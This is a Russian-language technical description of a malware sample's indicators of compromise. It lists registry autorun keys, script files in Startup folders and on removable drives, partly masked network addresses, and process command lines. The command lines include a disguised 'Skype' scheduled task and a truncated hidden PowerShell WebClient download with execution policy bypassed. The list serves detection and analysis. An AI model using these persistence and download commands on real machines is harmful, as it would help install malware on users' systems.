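Техническая информация
Ниже перечислены признаки активности образца в том порядке, в каком они приведены в источнике: ключ автозапуска в реестре, пути к файлам (в том числе в папке автозагрузки и на съемном носителе), сетевые адреса и DNS-запрос, классы окон и командные строки процессов. Заголовков подразделов в тексте нет (вероятно, они утрачены при извлечении), поэтому повторяющиеся пути, по-видимому, относятся к разным подразделам. Символы «##» в IP-адресе и имени узла, судя по всему, заменяют скрытую часть значения, так что эти строки нельзя использовать как точные индикаторы. Командные строки приведены как записаны: в строке с schtasks.exe нет закрывающей кавычки, а строка с powershell обрезана («...»).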
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'XF8EX8K2CD' = '"%TEMP%\2.js"'
- %HOMEPATH%\Start Menu\Programs\Startup\2.js
- %HOMEPATH%\Start Menu\Programs\Startup\1.vbs
- <Имя диска съемного носителя>:\2.js
- %TEMP%\aut1.tmp
- %TEMP%\1.vbs
- %TEMP%\aut2.tmp
- %TEMP%\2.js
- %TEMP%\aut3.tmp
- %TEMP%\3.m3u
- <Имя диска съемного носителя>:\2.js
- %TEMP%\aut1.tmp
- %TEMP%\aut2.tmp
- %TEMP%\aut3.tmp
- 'localhost':1040
- '46.##1.250.197':8900
- 'sw##.fannan.se':8000
- DNS ASK sw##.fannan.se
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- '<SYSTEM32>\wscript.exe' "%TEMP%\2.js"
- '<SYSTEM32>\wscript.exe' "%TEMP%\1.vbs"
- '%ProgramFiles%\Windows Media Player\wmplayer.exe' /prefetch:6 /Open "%TEMP%\3.m3u"
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr "%TEMP%\2.js
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient....